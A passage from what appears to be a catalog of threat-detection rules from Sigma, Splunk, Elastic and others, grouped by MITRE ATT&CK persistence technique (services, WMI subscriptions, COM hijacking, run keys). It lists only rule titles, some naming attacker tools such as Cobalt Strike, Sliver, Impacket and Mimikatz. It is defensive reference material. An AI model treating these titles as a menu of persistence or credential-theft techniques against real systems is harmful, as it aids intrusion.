- Elastic Service Creation via Local Kerberos Authentication production
- Elastic Service DACL Modification via sc.exe production
- Sigma Service Installation in Suspicious Folder test
- Sigma Service Installation with Suspicious Folder Pattern test
- Splunk Service Installed (Windows Event Log)
- Sigma Service Installed By Unusual Client - Security test
- Sigma Service Installed By Unusual Client - System test
- Elastic Service Path Modification production
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
- Sigma ServiceDll Hijack test
- Splunk Services LOLBAS Execution Process Spawn production
- Splunk SimpleHelp Remote Access Tool Service Installation (Windows Event Log)
- Sigma Sliver C2 Default Service Installation test
- Sigma StoneDrill Service Install test
- Kusto SUNBURST suspicious SolarWinds child processes (Normalized Process Events)
- Splunk Suspicious .sys Created - Windows (Sysmon)
- Elastic Suspicious ImagePath Service Creation production
- Sigma Suspicious New Service Creation test
- Splunk Suspicious PlistBuddy Usage experimental
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet test
- Sigma Suspicious Service Installation test
- Sigma Suspicious Service Installation Script test
- Sigma Suspicious Service Path Modification test
- Elastic Suspicious Service was Installed in the System production
- YARA-L Suspicious Windows Service Installation Detected
- Sigma Sysinternals PsService Execution test
- Sigma Sysinternals PsSuspend Execution test
- Elastic System Shells via Services production
- Sigma TeamPCP LiteLLM Supply Chain Attack Persistence Indicators experimental
- Kusto TEARDROP memory-only dropper available
- Sigma Turla PNG Dropper Service test
- Sigma Turla Service Install test
- Sigma Uncommon Service Installation Image Path test
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unusual Persistence via Services Registry production
- Sigma Vulnerable Driver Load test
- Sigma Vulnerable Driver Load By Name test
- Sigma Vulnerable HackSys Extreme Vulnerable Driver Load test
- Sigma Vulnerable WinRing0 Driver Load test
- Splunk Windows Bluetooth Service Installed From Uncommon Location production
- Splunk Windows KrbRelayUp Service Creation production
- Splunk Windows Local LLM Framework Execution production
- Splunk Windows Process Execution in Temp Dir production
- Splunk Windows Remote Create Service production
- Splunk Windows Service Create Kernel Mode Driver production
- Splunk Windows Service Create RemComSvc production
- Splunk Windows Service Create with Tscon production
- Splunk Windows Service Created (Sysmon)
- Splunk Windows Service Created (Windows Event Log)
- Splunk Windows Service Creation on Remote Endpoint production
- Splunk Windows Service Initiation on Remote Endpoint production
- Elastic Windows Service Installed via an Unusual Client production
- Splunk Windows Suspicious Driver Loaded Path production
- Splunk Windows Suspicious Process File Path production
- Splunk Windows Vulnerable Driver Installed production
- Splunk Windows Vulnerable Driver Loaded production
- Splunk Wscript Or Cscript Suspicious Child Process production
- Splunk XMRIG Driver Loaded production
Create or Modify System Process: Launch Agent T1543.001 1 rule
- Splunk Suspicious PlistBuddy Usage experimental
Create or Modify System Process: Systemd Service T1543.002 2 rules
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Sigma TeamPCP LiteLLM Supply Chain Attack Persistence Indicators experimental
Create or Modify System Process: Windows Service T1543.003 108 rules
- Sigma Allow Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Splunk CMD Echo Pipe - Escalation production
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma CosmicDuke Service Installation test
- Sigma Deny Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Sigma Devcon Execution Disabling VMware VMCI Device experimental
- Sigma Driver Load From A Temporary Directory test
- Splunk Driver Loaded from Unusual Path - Windows (Sysmon)
- Sigma EAP service activation by Liontail framework for DLL sideloading (via command) stable
- Sigma Encoded PowerShell payload deployed via service experimental
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Sigma Impacket SMBexec service creation (registry) experimental
- Sigma Impacket SMBexec service registration (native) experimental
- Splunk Kernel Service Installed - Windows (Windows Event Log)
- Sigma Malicious Driver Load test
- Sigma Malicious Driver Load By Name test
- Sigma Mimikatz driver deployed via service experimental
- Sigma Mimikatz driver registration (Reg via Sysmon) experimental
- Sigma Moriya Rootkit - System test
- Sigma Moriya Rootkit File Created test
- Sigma New Kernel Driver Via SC.EXE test
- Sigma New PDQDeploy Service - Client Side test
- Sigma New PDQDeploy Service - Server Side test
- Sigma New Service Creation Using PowerShell test
- Sigma New Service Creation Using Sc.EXE test
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Elastic Persistence via Update Orchestrator Service Hijack production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma ProcessHacker Privilege Elevation test
- Sigma PSEXEC Remote Execution File Artefact test
- Splunk PSexec Service Creation (Windows Event Log)
- Sigma PSexec service installation experimental
- Sigma PUA - Kernel Driver Utility (KDU) Execution experimental
- Splunk Randomly Generated Windows Service Name experimental
- Kusto Rare Process as a Service available
- Sigma RDP session hijack via service creation abuse experimental
- Sigma Remote Access Tool Services Have Been Installed - Security test
- Sigma Remote Access Tool Services Have Been Installed - System test
- Elastic Remote Windows Service Installed production
- Sigma Service abuse with backdoored "command failure" (Reg via command) experimental
- Sigma Service abuse with backdoored "command failure" (Reg via PowerShell) experimental
- Sigma Service abuse with backdoored "command failure" (service) experimental
- Sigma Service abuse with malicious ImagePath (Reg via PowerShell) experimental
- Sigma Service abuse with malicious ImagePath (service) experimental
- Elastic Service Command Lateral Movement production
- Elastic Service Control Spawned via Script Interpreter production
- Sigma Service creation (command) experimental
- Sigma Service creation (PowerShell) experimental
- Elastic Service Creation via Local Kerberos Authentication production
- Elastic Service DACL Modification via sc.exe production
- Sigma Service Installation in Suspicious Folder test
- Sigma Service Installation with Suspicious Folder Pattern test
- Elastic Service Path Modification production
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
- Sigma ServiceDll Hijack test
- Splunk Services LOLBAS Execution Process Spawn production
- Sigma Sliver C2 Default Service Installation test
- Sigma StoneDrill Service Install test
- Splunk Suspicious .sys Created - Windows (Sysmon)
- Elastic Suspicious ImagePath Service Creation production
- Sigma Suspicious New Service Creation test
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet test
- Sigma Suspicious Service Installation test
- Sigma Suspicious Service Installation Script test
- Sigma Suspicious Service Path Modification test
- Elastic Suspicious Service was Installed in the System production
- YARA-L Suspicious Windows Service Installation Detected
- Sigma Sysinternals PsService Execution test
- Sigma Sysinternals PsSuspend Execution test
- Elastic System Shells via Services production
- Sigma Turla PNG Dropper Service test
- Sigma Turla Service Install test
- Sigma Uncommon Service Installation Image Path test
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unusual Persistence via Services Registry production
- Sigma Vulnerable Driver Load test
- Sigma Vulnerable Driver Load By Name test
- Sigma Vulnerable HackSys Extreme Vulnerable Driver Load test
- Sigma Vulnerable WinRing0 Driver Load test
- Splunk Windows Bluetooth Service Installed From Uncommon Location production
- Splunk Windows KrbRelayUp Service Creation production
- Splunk Windows Remote Create Service production
- Splunk Windows Service Create Kernel Mode Driver production
- Splunk Windows Service Create RemComSvc production
- Splunk Windows Service Create with Tscon production
- Splunk Windows Service Creation on Remote Endpoint production
- Splunk Windows Service Initiation on Remote Endpoint production
- Elastic Windows Service Installed via an Unusual Client production
- Splunk Windows Suspicious Driver Loaded Path production
- Splunk Windows Vulnerable Driver Installed production
- Splunk Windows Vulnerable Driver Loaded production
- Splunk XMRIG Driver Loaded production
Create or Modify System Process: Launch Daemon T1543.004 1 rule
- Sigma Atomic MacOS Stealer - Persistence Indicators experimental
Event Triggered Execution T1546 139 rules
- Splunk Access Common Package Config file (EDR)
- Splunk Access Common Package Config file (PowerShell)
- Splunk Access Common Package Config file (Sysmon)
- Splunk Access Common Package Config file (Windows Event Log)
- Sigma AdminSDHolder permissions changed for persistence experimental
- Kusto Caramel Tsunami Actor IOC - July 2021 available
- Sigma Change Default File Association To Executable Via Assoc test
- Sigma Change Default File Association Via Assoc test
- Sigma COM Hijack via Sdclt test
- Sigma COM Hijacking via TreatAs test
- Sigma COM Object Hijacking Via Modification Of Default System CLSID Default Value experimental
- Splunk Command Line Utility Added to Accessibility Features (PowerShell)
- Splunk Command Line Utility Added to Accessibility Features (Sysmon)
- Splunk Command Line Utility Added to Accessibility Features (Windows Event Log)
- Elastic Component Object Model Hijacking production
- Kusto Component Object Model Hijacking - Vault7 trick available
- Sigma Control Panel Items test
- Splunk Detect WMI Event Subscription Persistence production
- Sigma HAFNIUM Exchange Exploitation Activity test
- Elastic Image File Execution Options Injection production
- Elastic Installation of Custom Shim Databases production
- Kusto Modification of Accessibility Features
- Elastic Mofcomp Activity production
- Sigma MSSQL Extended Stored Procedure Backdoor Maggie test
- Elastic Netsh Helper DLL production
- Sigma Netsh helper DLL abuse (process) experimental
- Sigma Netsh helper DLL abuse (Reg via Sysmon) experimental
- Sigma New ActiveScriptEventConsumer Created Via Wmic.EXE test
- Sigma New DLL Added to AppCertDlls Registry Key test
- Sigma New DLL Added to AppInit_DLLs Registry Key test
- Sigma New Netsh Helper DLL Registered From A Suspicious Location test
- Sigma New Outlook Macro Created test
- Sigma Outlook Macro Execution Without Warning Setting Enabled test
- Splunk Overwriting Accessibility Binaries production
- Sigma Path To Screensaver Binary Modified test
- Sigma Persistence Via Sticky Key Backdoor test
- Elastic Persistence via WMI Event Subscription production
- Elastic Potential Application Shimming via Sdbinst production
- Sigma Potential COM Object Hijacking Via TreatAs Subkey - Registry test
- Elastic Potential Modification of Accessibility Binaries production
- Sigma Potential Persistence Using DebugPath test
- Sigma Potential Persistence Via App Paths Default Property test
- Sigma Potential Persistence Via AppCompat RegisterAppRestart Layer test
- Sigma Potential Persistence Via GlobalFlags test
- Sigma Potential Persistence Via Netsh Helper DLL test
- Sigma Potential Persistence Via Netsh Helper DLL - Registry test
- Sigma Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting test
- Sigma Potential Persistence Via PowerShell User Profile Using Add-Content test
- Sigma Potential Persistence Via Scrobj.dll COM Hijacking test
- Sigma Potential Persistence Via Shim Database In Uncommon Location test
- Sigma Potential Persistence Via Shim Database Modification test
- Sigma Potential Privilege Escalation Using Symlink Between Osk and Cmd test
- Sigma Potential PSFactoryBuffer COM Hijacking test
- Sigma Potential Remote WMI ActiveScriptEventConsumers Activity test
- Elastic Potential RemoteMonologue Attack production
- Sigma Potential Shim Database Persistence via Sdbinst.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Splunk Powershell COM Hijacking InprocServer32 Modification production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell Execute COM Object production
- Sigma PowerShell Profile Modification test
- Sigma Powershell WMI Persistence test
- Splunk Registry Keys for Creating SHIM Databases production
- Splunk Registry Keys Used For Privilege Escalation production
- Sigma Registry Modification of MS-settings Protocol Handler test
- Elastic Registry Persistence via AppCert DLL production
- Kusto Registry Persistence via AppCert DLL Modification available
- Elastic Registry Persistence via AppInit DLL production
- Kusto Registry Persistence via AppInit DLLs Modification available
- Sigma Rundll32 Registered COM Objects test
- Splunk Rundll32 Spawned by Disk Cleanup (Sysmon)
- Splunk Rundll32 Spawned by Disk Cleanup (Windows Event Log)
- Splunk Screensaver Event Trigger Execution production
- Sigma Session Manager Autorun Keys Modification test
- Sigma Shell Open Registry Keys Manipulation test
- Splunk Shim Database File Creation production
- Splunk Shim Database Installation With Suspicious Parameters production
- Sigma SOURGUM Actor Behaviours test
- Sigma Stickey key called CMD via command execution experimental
- Sigma Stickey key called CMD via command execution (hash detection) experimental
- Sigma Stickey key IFEO (Reg via command) experimental
- Sigma Stickey key IFEO registry changed (Reg via Sysmon) experimental
- Sigma Sticky key file created from CMD copy experimental
- Sigma Sticky Key Like Backdoor Execution test
- Sigma Sticky Key Like Backdoor Usage - Registry test
- Sigma Sticky key sethc command for replacement by CMD experimental
- Sigma Sticky key sethc file failed replacement experimental
- Kusto SUNBURST and SUPERNOVA backdoor hashes available
- Kusto SUNBURST and SUPERNOVA backdoor hashes (Normalized File Events)
- Kusto SUNBURST network beacons available
- Sigma Suspicious Debugger Registration Cmdline test
- Splunk Suspicious DLLhost Execution (EDR)
- Splunk Suspicious DLLhost Execution (PowerShell)
- Splunk Suspicious DLLhost Execution (Windows Event Log)
- Sigma Suspicious Encoded Scripts in a WMI Consumer test
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Sysmon)
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Windows Event Log)
- Sigma Suspicious Get-Variable.exe Creation test
- Sigma Suspicious GetTypeFromCLSID ShellExecute test
- Splunk Suspicious InprocServer32 Registry Modification (Sysmon)
- Splunk Suspicious InprocServer32 Registry Modification (Windows Event Log)
- Sigma Suspicious Outlook Macro Created test
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Sigma Suspicious ScreenSave Change by Reg.exe test
- Sigma Suspicious Screensaver Binary File Creation test
- Sigma Suspicious Shell Open Command Registry Modification experimental
- Sigma Suspicious Shim Database Patching Activity test
- Elastic Suspicious WerFault Child Process production
- Elastic Suspicious WMI Event Subscription Created production
- Sigma System crash behavior manipulation - WMImplant (registry) experimental
- Sigma Uncommon Extension Shim Database Installation Via Sdbinst.EXE test
- Elastic Uncommon Registry Persistence Change production
- Sigma VsCode Powershell Profile Modification test
- Elastic Werfault ReflectDebugger Persistence production
- Splunk Windows AD AdminSDHolder ACL Modified production
- Splunk Windows AppCertDLL Modification Via Command Line production
- Splunk Windows Change File Association Command To Notepad production
- Splunk Windows COM Hijacking InprocServer32 Modification production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Event Triggered Image File Execution Options Injection production
- Splunk Windows MOF Event Triggered Execution via WMI production
- Splunk Windows New Default File Association Value Set production
- Sigma WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load test
- Sigma WMI Backdoor Exchange Transport Agent test
- Sigma WMI Event Subscription test
- Splunk WMI Permanent Event Subscription - Sysmon production
- Sigma WMI Persistence test
- Sigma WMI Persistence - Command Line Event Consumer test
- Sigma WMI Persistence - Script Event Consumer test
- Sigma WMI Persistence - Script Event Consumer File Write test
- Sigma WMI Persistence - Security test
- Sigma WMI registration experimental
- Sigma WMI registration (PowerShell) experimental
- Splunk WMI subscription execution (Sysmon)
- Splunk WMI subscription execution (Windows Event Log)
- Sigma Writing Local Admin Share test
- Kusto Zinc Actor IOCs files - October 2022 available
Event Triggered Execution: Change Default File Association T1546.001 7 rules
- Sigma Change Default File Association To Executable Via Assoc test
- Sigma Change Default File Association Via Assoc test
- Sigma Registry Modification of MS-settings Protocol Handler test
- Sigma Shell Open Registry Keys Manipulation test
- Sigma Suspicious Shell Open Command Registry Modification experimental
- Splunk Windows Change File Association Command To Notepad production
- Splunk Windows New Default File Association Value Set production
Event Triggered Execution: Screensaver T1546.002 6 rules
- Sigma Path To Screensaver Binary Modified test
- Splunk Screensaver Event Trigger Execution production
- Sigma Suspicious ScreenSave Change by Reg.exe test
- Sigma Suspicious Screensaver Binary File Creation test
- Elastic Uncommon Registry Persistence Change production
- Sigma Writing Local Admin Share test
Event Triggered Execution: Windows Management Instrumentation Event Subscription T1546.003 23 rules
- Splunk Detect WMI Event Subscription Persistence production
- Elastic Mofcomp Activity production
- Sigma New ActiveScriptEventConsumer Created Via Wmic.EXE test
- Elastic Persistence via WMI Event Subscription production
- Sigma Potential Remote WMI ActiveScriptEventConsumers Activity test
- Sigma Powershell WMI Persistence test
- Sigma Suspicious Encoded Scripts in a WMI Consumer test
- Elastic Suspicious WMI Event Subscription Created production
- Sigma System crash behavior manipulation - WMImplant (registry) experimental
- Splunk Windows MOF Event Triggered Execution via WMI production
- Sigma WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load test
- Sigma WMI Backdoor Exchange Transport Agent test
- Sigma WMI Event Subscription test
- Splunk WMI Permanent Event Subscription - Sysmon production
- Sigma WMI Persistence test
- Sigma WMI Persistence - Command Line Event Consumer test
- Sigma WMI Persistence - Script Event Consumer test
- Sigma WMI Persistence - Script Event Consumer File Write test
- Sigma WMI Persistence - Security test
- Sigma WMI registration experimental
- Sigma WMI registration (PowerShell) experimental
- Splunk WMI subscription execution (Sysmon)
- Splunk WMI subscription execution (Windows Event Log)
Event Triggered Execution: Netsh Helper DLL T1546.007 7 rules
- Elastic Netsh Helper DLL production
- Sigma Netsh helper DLL abuse (process) experimental
- Sigma Netsh helper DLL abuse (Reg via Sysmon) experimental
- Sigma New Netsh Helper DLL Registered From A Suspicious Location test
- Sigma Potential Persistence Via Netsh Helper DLL test
- Sigma Potential Persistence Via Netsh Helper DLL - Registry test
- Sigma Potential Suspicious Activity Using SeCEdit test
Event Triggered Execution: Accessibility Features T1546.008 22 rules
- Splunk Command Line Utility Added to Accessibility Features (PowerShell)
- Splunk Command Line Utility Added to Accessibility Features (Sysmon)
- Splunk Command Line Utility Added to Accessibility Features (Windows Event Log)
- Kusto Modification of Accessibility Features
- Splunk Overwriting Accessibility Binaries production
- Sigma Persistence Via Sticky Key Backdoor test
- Elastic Potential Modification of Accessibility Binaries production
- Sigma Potential Privilege Escalation Using Symlink Between Osk and Cmd test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Stickey key called CMD via command execution experimental
- Sigma Stickey key called CMD via command execution (hash detection) experimental
- Sigma Stickey key IFEO (Reg via command) experimental
- Sigma Stickey key IFEO registry changed (Reg via Sysmon) experimental
- Sigma Sticky key file created from CMD copy experimental
- Sigma Sticky Key Like Backdoor Execution test
- Sigma Sticky Key Like Backdoor Usage - Registry test
- Sigma Sticky key sethc command for replacement by CMD experimental
- Sigma Sticky key sethc file failed replacement experimental
- Sigma Suspicious Debugger Registration Cmdline test
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Sysmon)
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Windows Event Log)
Event Triggered Execution: AppCert DLLs T1546.009 5 rules
- Sigma New DLL Added to AppCertDlls Registry Key test
- Elastic Registry Persistence via AppCert DLL production
- Kusto Registry Persistence via AppCert DLL Modification available
- Sigma Session Manager Autorun Keys Modification test
- Splunk Windows AppCertDLL Modification Via Command Line production
Event Triggered Execution: AppInit DLLs T1546.010 3 rules
- Sigma New DLL Added to AppInit_DLLs Registry Key test
- Elastic Registry Persistence via AppInit DLL production
- Kusto Registry Persistence via AppInit DLLs Modification available
Event Triggered Execution: Application Shimming T1546.011 11 rules
- Elastic Installation of Custom Shim Databases production
- Elastic Potential Application Shimming via Sdbinst production
- Sigma Potential Persistence Via AppCompat RegisterAppRestart Layer test
- Sigma Potential Persistence Via Shim Database In Uncommon Location test
- Sigma Potential Persistence Via Shim Database Modification test
- Sigma Potential Shim Database Persistence via Sdbinst.EXE test
- Splunk Registry Keys for Creating SHIM Databases production
- Splunk Shim Database File Creation production
- Splunk Shim Database Installation With Suspicious Parameters production
- Sigma Suspicious Shim Database Patching Activity test
- Sigma Uncommon Extension Shim Database Installation Via Sdbinst.EXE test
Event Triggered Execution: Image File Execution Options Injection T1546.012 10 rules
- Elastic Image File Execution Options Injection production
- Sigma Potential Persistence Via App Paths Default Property test
- Sigma Potential Persistence Via GlobalFlags test
- Splunk Registry Keys Used For Privilege Escalation production
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Elastic Suspicious WerFault Child Process production
- Elastic Uncommon Registry Persistence Change production
- Elastic Werfault ReflectDebugger Persistence production
- Splunk Windows Event Triggered Image File Execution Options Injection production
Event Triggered Execution: Component Object Model Hijacking T1546.015 22 rules
- Sigma COM Hijacking via TreatAs test
- Sigma COM Object Hijacking Via Modification Of Default System CLSID Default Value experimental
- Elastic Component Object Model Hijacking production
- Kusto Component Object Model Hijacking - Vault7 trick available
- Sigma Potential COM Object Hijacking Via TreatAs Subkey - Registry test
- Sigma Potential Persistence Using DebugPath test
- Sigma Potential Persistence Via Scrobj.dll COM Hijacking test
- Sigma Potential PSFactoryBuffer COM Hijacking test
- Elastic Potential RemoteMonologue Attack production
- Splunk Powershell COM Hijacking InprocServer32 Modification production
- Splunk Powershell Execute COM Object production
- Sigma Rundll32 Registered COM Objects test
- Splunk Rundll32 Spawned by Disk Cleanup (Sysmon)
- Splunk Rundll32 Spawned by Disk Cleanup (Windows Event Log)
- Sigma SOURGUM Actor Behaviours test
- Splunk Suspicious DLLhost Execution (EDR)
- Splunk Suspicious DLLhost Execution (PowerShell)
- Splunk Suspicious DLLhost Execution (Windows Event Log)
- Sigma Suspicious GetTypeFromCLSID ShellExecute test
- Splunk Suspicious InprocServer32 Registry Modification (Sysmon)
- Splunk Suspicious InprocServer32 Registry Modification (Windows Event Log)
- Splunk Windows COM Hijacking InprocServer32 Modification production
Boot or Logon Autostart Execution T1547 154 rules
- Splunk Active Setup Registry Autostart production
- Splunk Add DLL_EXE Registry Value (Sysmon)
- Sigma Add Port Monitor Persistence in Registry test
- Splunk Additional dll added to Spool Driver (Sysmon)
- Splunk Additional dll added to Spool Driver (Windows Event Log)
- Sigma Atbroker Registry Change test
- Sigma Bypass UAC Using Event Viewer test
- Sigma Classes Autorun Keys Modification test
- Sigma Common Autorun Keys Modification test
- Sigma Creation Exe for Service with Unquoted Path test
- Sigma CurrentControlSet Autorun Keys Modification test
- YARA-L CurrentControlSet Autorun Keys Modification
- Sigma CurrentVersion Autorun Keys Modification test
- YARA-L CurrentVersion Autorun Keys Modification
- Sigma CurrentVersion NT Autorun Keys Modification test
- Sigma Default RDP Port Changed to Non Standard Port test
- YARA-L Default RDP Port Changed to Non Standard Port
- Sigma Desktop.INI Created by Uncommon Process test
- Kusto Detect Print Processors Registry Driver Key Creation/Modification available
- Kusto Detect Registry Run Key Creation/Modification available
- Sigma Direct Autorun Keys Modification test
- YARA-L Direct Autorun Keys Modification
- Sigma DLL Load via LSASS test
- Splunk Execution from Startup Folder (Sysmon)
- Splunk Execution from Startup Folder (Windows Event Log)
- Elastic Execution of Persistent Suspicious Program production
- Sigma File Creation In Suspicious Directory By Msdt.EXE test
- Splunk File Written to Startup Folder - Windows (Sysmon)
- Splunk File Written to Startup Folder - Windows (Windows Event Log)
- Sigma Forest Blizzard APT - Custom Protocol Handler Creation test
- Sigma Forest Blizzard APT - Custom Protocol Handler DLL Registry Set test
- Kusto Imminent Ransomware available
- Elastic Installation of Security Support Provider production
- Sigma Internet Explorer Autorun Keys Modification test
- Sigma Kapeka Backdoor Autorun Persistence test
- Elastic Lateral Movement via Startup Folder production
- Sigma Leviathan Registry Key Activity test
- Splunk LSA Authentication Packages Registry Key Modified (PowerShell)
- Splunk LSA Authentication Packages Registry Key Modified (Sysmon)
- Splunk LSA Authentication Packages Registry Key Modified (Windows Event Log)
- Kusto Midnight Blizzard - suspicious rundll32.exe execution of vbscript
- Kusto Midnight Blizzard - suspicious rundll32.exe execution of vbscript (Normalized Process Events)
- Sigma Modify User Shell Folders Startup Value test
- YARA-L Modify User Shell Folders Startup Value
- Splunk Monitor Registry Keys for Print Monitors production
- Sigma Narrator's Feedback-Hub Persistence test
- Splunk New AutoRun Registry Key (PowerShell)
- Sigma New Custom Shim Database Created test
- Sigma New RUN Key Pointing to Suspicious Folder experimental
- YARA-L New RUN Key Pointing to Suspicious Folder
- Sigma New TimeProviders Registered With Uncommon DLL Name test
- Sigma NTFS hard link creation experimental
- Sigma NTFS symbolic link configuration change experimental
- Sigma NTFS symbolic link creation experimental
- Sigma Office Autorun Keys Modification test
- Elastic Persistence via a Windows Installer production
- Elastic Persistence via Hidden Run Key Detected production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Potential KamiKakaBot Activity - Winlogon Shell Persistence test
- Elastic Potential LSA Authentication Package Abuse production
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Sigma Potential Persistence Attempt Via Run Keys Using Reg.EXE test
- Elastic Potential Persistence via Mandatory User Profile production
- Elastic Potential Persistence via Time Provider Modification production
- Elastic Potential Port Monitor or Print Processor Registration Abuse production
- Splunk Potential Proxy Malware via AutoRun Key (PowerShell)
- Splunk Potential Proxy Malware via AutoRun Key (Sysmon)
- Splunk Potential Proxy Malware via AutoRun Key (Windows Event Log)
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential RipZip Attack on Startup Folder test
- Sigma Potential Ryuk Ransomware Activity stable
- Sigma Potential Startup Shortcut Persistence Via PowerShell.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- YARA-L Potential Suspicious Activity Using SeCEdit
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Print Processor Registry Autostart production
- Splunk Print Spooler Adding A Printer Driver production
- Splunk Print Spooler Failed to Load a Plug-in production
- Sigma Print spooler privilege escalation via printer added (CVE-2020-1048) experimental
- Splunk Rare dll called by Spoolsv.exe (Windows Event Log)
- Splunk Registry Keys Used For Persistence production
- Sigma Registry Persistence Mechanisms in Recycle Bin test
- Sigma Registry Persistence via Explorer Run Key test
- Kusto Registry Run Keys - Suspicious Registry Run Keys
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Security package (SSP) added (Reg via command) experimental
- Sigma Security package (SSP) loaded into LSA (native) experimental
- Sigma Security Support Provider (SSP) Added to LSA Configuration test
- Sigma Session Manager Autorun Keys Modification test
- YARA-L Session Manager Autorun Keys Modification
- Splunk Shortcut Created in Startup Folder - Windows (PowerShell)
- Splunk Spoolsv Spawning Rundll32 production
- Splunk Spoolsv Suspicious Loaded Modules production
- Splunk Spoolsv Writing a DLL production
- Splunk Spoolsv Writing a DLL - Sysmon production
- Sigma Startup Folder File Write test
- Splunk Startup Folder Location Modified - Windows (PowerShell)
- Splunk Startup Folder Location Modified - Windows (Sysmon)
- Splunk Startup Folder Location Modified - Windows (Windows Event Log)
- Elastic Startup Folder Persistence via Unsigned Process production
- Elastic Startup or Run Key Registry Modification production
- Sigma Startup/Logon Script Added to Group Policy Object test
- Elastic Startup/Logon Script added to Group Policy Object production
- Sigma Suspicious Autorun Registry Modified via WMI experimental
- Sigma Suspicious Driver Install by pnputil.exe test
- Sigma Suspicious GrpConv Execution test
- Elastic Suspicious Module Loaded by LSASS production
- Sigma Suspicious PowerShell In Registry Run Keys test
- YARA-L Suspicious Powershell In Registry Run Keys
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Sigma Suspicious Run Key from Download test
- Sigma Suspicious Startup Folder Persistence test
- Elastic Suspicious Startup Shell Folder Modification production
- Sigma Suspicious VBScript UN2452 Pattern test
- Splunk Symbolic OR Hard File Link Created (PowerShell)
- Splunk Symbolic OR Hard File Link Created (Windows Event Log)
- Sigma System Scripts Autorun Keys Modification test
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
- Splunk Time Provider Persistence Registry production
- Elastic Uncommon Registry Persistence Change production
- Splunk Unusual winlogon.exe Child Process (Sysmon)
- Splunk Unusual winlogon.exe Child Process (Windows Event Log)
- Sigma User Shell Folders Registry Modification via CommandLine experimental
- Sigma VBScript Payload Stored in Registry test
- Splunk Windows Audit Policy Auditing Option Modified - Registry production
- Splunk Windows Autostart Execution LSASS Driver Registry Modification production
- Splunk Windows Boot or Logon Autostart Execution In Startup Folder production
- Sigma Windows Event Log Access Tampering Via Registry experimental
- Sigma Windows Network Access Suspicious desktop.ini Action test
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows PowerShell MSIX Package Installation production
- Splunk Windows Registry BootExecute Modification production
- Splunk Windows Registry Modification for Safe Mode Persistence production
- Splunk Windows Security Support Provider Reg Query production
- Splunk Windows Snake Malware Kernel Driver Comadmin production
- Splunk Windows Snake Malware Service Create production
- Sigma Windows Terminal Profile Settings Modification By Uncommon Process test
- Splunk Windows Unsigned MS DLL Side-Loading production
- Sigma WINEKEY Registry Modification test
- Sigma Winlogon Helper DLL test
- Sigma Winlogon Notify Key Logon Persistence test
- Splunk WinLogon Registry Key Modified (PowerShell)
- Splunk WinLogon Registry Key Modified (Sysmon)
- Sigma WinRAR Creating Files in Startup Locations experimental
- Sigma WinSock2 Autorun Keys Modification test
- Sigma Wow6432Node Classes Autorun Keys Modification test
- Splunk Wow6432Node Classes Autorun Keys Modification (PowerShell)
- Splunk Wow6432Node Classes Autorun Keys Modification (Sysmon)
- Splunk Wow6432Node Classes Autorun Keys Modification (Windows Event Log)
- Sigma Wow6432Node CurrentVersion Autorun Keys Modification test
- Sigma Wow6432Node Windows NT CurrentVersion Autorun Keys Modification test
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 84 rules
- Splunk Add DLL_EXE Registry Value (Sysmon)
